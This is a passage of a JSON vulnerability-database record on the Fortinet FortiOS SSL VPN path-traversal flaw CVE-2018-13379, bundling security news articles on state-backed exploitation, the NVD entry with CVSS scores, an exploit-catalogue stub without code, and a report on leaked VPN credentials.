Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-10T12:11:12", "description": "State-sponsored advanced persistent threat (APT) groups are using flaws in outdated VPN technologies from Palo Alto Networks, Fortinet and Pulse Secure to carry out cyber attacks on targets in the United States and overseas, warned U.S. and U.K. officials.\n\nThe National Security Agency (NSA) issued a [Cybersecurity Advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) Monday about the threats and offered mitigation suggestions, warning that multiple APT actors have weaponized three critical vulnerabilities first published in August\u2013[CVE-2019-11539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539>), [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) and [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\u2013to gain access to vulnerable VPN devices. The first two affect Pulse Secure VPNs while the third affects Fortinet technology.\n\nThe National Cyber Security Centre in the United Kingdom posted [a separate warning](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) about the threats, which stem from vulnerabilities that allow \u201can attacker to retrieve arbitrary files, including those containing authentication credentials,\u201d according to the post.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaws allow an attacker to use those stolen credentials to connect to the VPN and change configuration settings or even connect to other infrastructure on the network, authorities warned. Through this unauthorized connection, an attacker could gain privileges to run secondary exploits that could allow them to access a root shell.\n\nThe U.K.\u2019s alert added two more Fortinet vulnerabilities to the list\u2013[CVE-2018-13382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382>) and [CVE-2018-13383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383>)\u2014as well as a Palo Alto Networks VPN flaw, [CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>).\n\nAuthorities offered a series of mitigation techniques for the vulnerabilities, which they said should be taken very seriously by users of these products.\n\nTo mitigate attacks against all of the existing threats, officials recommend a couple of basic steps: apply any existing patches for VPNs in use that could be at risk, and update existing credentials. The NSA also recommended revoking existing VPN server keys and certificates and generating new ones.\n\nA more comprehensive list of mitigation techniques recommended by the NSA also includes discouraging the use of proprietary SSLVPN/TLSVPN protocols and self-signed and wild card certificates for public-facing VPN web applications; requiring mutual certificate-based authentication so remote clients attempting to access the public-facing VPN web application must present valid client certificates to maintain a connection; and using multi-factor authentication to prevent attackers from authenticating with compromised passwords by requiring a second authentication factor.\n\nNeither the NSA nor the National Cyber Security Centre alerts identified which groups are responsible for the attacks.\n\nThe warnings come after [reports surfaced](<https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/>) last month that APT5 was targeting VPNs from Fortinet and Pulse Secure after code for two of the aforementioned vulnerabilities was disclosed in a presentation at the Black Hat Security Conference (The two companies have patched those flaws, and in the case of Pulse Secure, issued the fixes in April, three months before Black Hat.).\n\nAPT5, a Chinese state-sponsored group also known as Manganese, has been active since 2007 with a particular focus on technology and telecommunications companies, according to a [report](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf>) by FireEye.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-08T12:44:16", "type": "threatpost", "title": "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1579"], "modified": "2019-10-08T12:44:16", "id": "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "href": "https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:09:03", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T21:29:00", "type": "cve", "title": "CVE-2018-13379", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-03T11:15:00", "cpe": ["cpe:/o:fortinet:fortios:6.0.4", "cpe:/o:fortinet:fortios:5.6.7"], "id": "CVE-2018-13379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13379", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fortinet:fortios:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:fortinet:fortios:6.0.4:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in Fortinet FortiGate SSL VPN fgt_lang lang parameter\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-17T00:00:00", "type": "dsquare", "title": "Fortinet FortiGate SSL VPN File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-17T00:00:00", "id": "E-691", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2021-09-09T16:34:58", "description": "A threat actor has leaked a list of almost 500,000 Fortinet VPN credentials, stolen from 87,000 vulnerable FortiGate SSL-VPN devices. The breach list provides raw access to organizations in 74 countries, including the USA, India, Taiwan, Italy, France, and Israel, with almost 3,000 US entities affected.\n\nAccording to [Fortinet](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) the credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) at the time of the actor&#x27;s scan. **Even if the devices have since been patched, if the passwords were not reset, they remain vulnerable.**\n\n### CVE-2018-13379\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question provides an improper limitation of a pathname to a restricted directory in several Fortinet FortiOS and FortiProxy versions. The vulnerable SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP requests. Apparently the FortiOS system files also contained login credentials.\n\nIn April, CVE-2018-13379 was mentioned in a joint [advisory](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from the NSA, CISA, and the FBI as one of five vulnerabilities widely used in on-going attacks by the Russian Foreign Intelligence Service (SVR). A patch for the vulnerability has been available since May 2019, but this patch has not been applied as widely as necessary.\n\n### The threat actor\n\nThe source, and the websites that leaked the information, make for an interesting story as well. The list of Fortinet credentials was leaked by someone going by the handle &#x27;Orange.&#x27; Orange is also the administrator of the newly launched RAMP hacking forum, and a previous operator of the Babuk Ransomware operation.\n\nAfter the [announced retirement of the Babuk gang](<https://blog.malwarebytes.com/reports/2021/06/babuk-ransomware-builder-leaked-following-muddled-retirement/>), Orange apparently went his own way and started RAMP. Orange is now involved in the Groove ransomware operation, which allegedly employs several former Babuk developers. The leak of Fortinet VPN SSL credentials was mirrored on the Groove leak website. Both posts lead to a file hosted on a Tor storage server known to be used by the Groove gang.\n\nRansomware leak sites are used to create some extra leverage over victim organizations. The ransomware attackers steal data from the infiltrated system while they deploy their ransomware. They then threaten to publish the data if the victim decides not to pay. Depending on the kind of data, this can be a rather compelling reason to give in.\n\n### Vulnerable security software\n\nOrganizations use Virtual Private Networks (VPNs) to provide remote access to their systems from the Internet. By design a VPN is remotely accessible so employees can reach them from anywhere, which also means that attackers can reach them from anywhere. And since VPNs provide access to an organization&#x27;s soft underbelly, a VPN that has a known vulnerability represents a high value target that&#x27;s easy to reach.\n\nThat makes swift patching an absolute necessity, but many organizations find this difficult, in part because VPNs are so important for remote working. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nA leak of this type is serious since valid VPN credentials could allow threat actors to access a network to steal data, expand their access, and run ransomware or other malware.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above, followed by initiating an organization-wide password reset, warning that you may remain vulnerable post-upgrade if your users&#x27; credentials were previously compromised.\n\nThe post [500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 